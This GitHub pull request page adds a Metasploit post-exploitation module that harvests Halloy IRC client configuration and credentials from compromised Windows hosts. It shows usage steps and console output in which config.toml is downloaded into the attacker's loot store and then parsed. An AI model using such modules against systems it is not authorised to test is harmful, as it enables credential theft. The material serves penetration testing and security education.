Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Halloy IRC PackRat module #19165

Merged
11 commits merged into from May 16, 2024
Merged

Add Halloy IRC PackRat module #19165

11 commits merged into from May 16, 2024

Conversation

The-Pink-Panther
Copy link
Contributor

@The-Pink-Panther The-Pink-Panther commented May 7, 2024
edited

As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new /post/windows/gather/credentials module for the Halloy IRC Client. https://github.com/squidowl/halloy

This pull request will add two files:

  1. modules/post/windows/gather/credentials/halloy_irc.rb
  2. documentation/modules/post/windows/gather/credentials/halloy_irc.md

Verification

  1. Start msfconsole
  2. Get a Meterpreter session on a Windows system
  3. use post/windows/gather/credentials/halloy_irc
  4. Set SESSION 1
  5. run

Scenario

Using Halloy v2024.6 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045

msf6 post(windows/gather/credentials/halloy_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Halloy irc's Config.toml file found
[*] Downloading C:\Users\test\AppData\Roaming\halloy\config.toml
[*] Halloy irc Config.toml downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_HalloyIRCconfig_968975.toml

[+] server="irc.libera.chat"
[+] port=6697
[+] nickname="halloy4169"
[+] File with data saved:  /home/kali/.msf4/loot/20240507133313_default_10.0.0.2_EXTRACTIONconfig_815098.toml
[*] PackRat credential sweep Completed
[*] Post module execution completed

@The-Pink-Panther The-Pink-Panther marked this pull request as ready for review May 7, 2024 20:29
The-Pink-Panther and others added 5 commits May 15, 2024 14:06
@The-Pink-Panther @cgranleese-r7
Fixed formatting issues
fb74915 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @cgranleese-r7
Removed unused regex search
8259db4 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@The-Pink-Panther @cgranleese-r7
Re-structured artifact enumeration option
121d3de 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
Added Halloy and Windows version to documentation scenarios
a250477
@The-Pink-Panther
Merge remote-tracking branch 'origin/Halloy-Packrat-Module' into Hall…
5bc9dd2 
…oy-Packrat-Module
@bwatters-r7 bwatters-r7 self-assigned this May 15, 2024
@bwatters-r7
Copy link
Contributor 

msf6 post(windows/gather/credentials/halloy_irc) > show options

Module options (post/windows/gather/credentials/halloy_irc):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, logins)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   SESSION       2                yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/halloy_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Halloy irc's base folder found
[*] Found the folder containing specified artifact for config.toml.
[*] Halloy irc's Config.toml file found
[*] Processing C:\Users\msfuser\AppData\Roaming\halloy
[*] Downloading C:\Users\msfuser\AppData\Roaming\halloy\config.toml
[*] Halloy irc Config.toml downloaded
[+] File saved to:  /home/tmoose/.msf4/loot/20240516151324_default_10.5.134.167_HalloyIRCconfig_797897.toml

[*] Searches for credentials (USERNAMES/PASSWORDS)
[+] server="irc.libera.chat"
[*] Searches for credentials (USERNAMES/PASSWORDS)
[+] nickname="halloy6531"
[+] File with data saved:  /home/tmoose/.msf4/loot/20240516151325_default_10.5.134.167_EXTRACTIONconfig_611466.toml
[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/halloy_irc) >

@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in d54b392 May 16, 2024
@bwatters-r7
Copy link
Contributor

Release Notes

This adds a module leveraging Packrat to gather credentials against Halloy IRC.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label May 17, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@The-Pink-Panther @bwatters-r7 @cgranleese-r7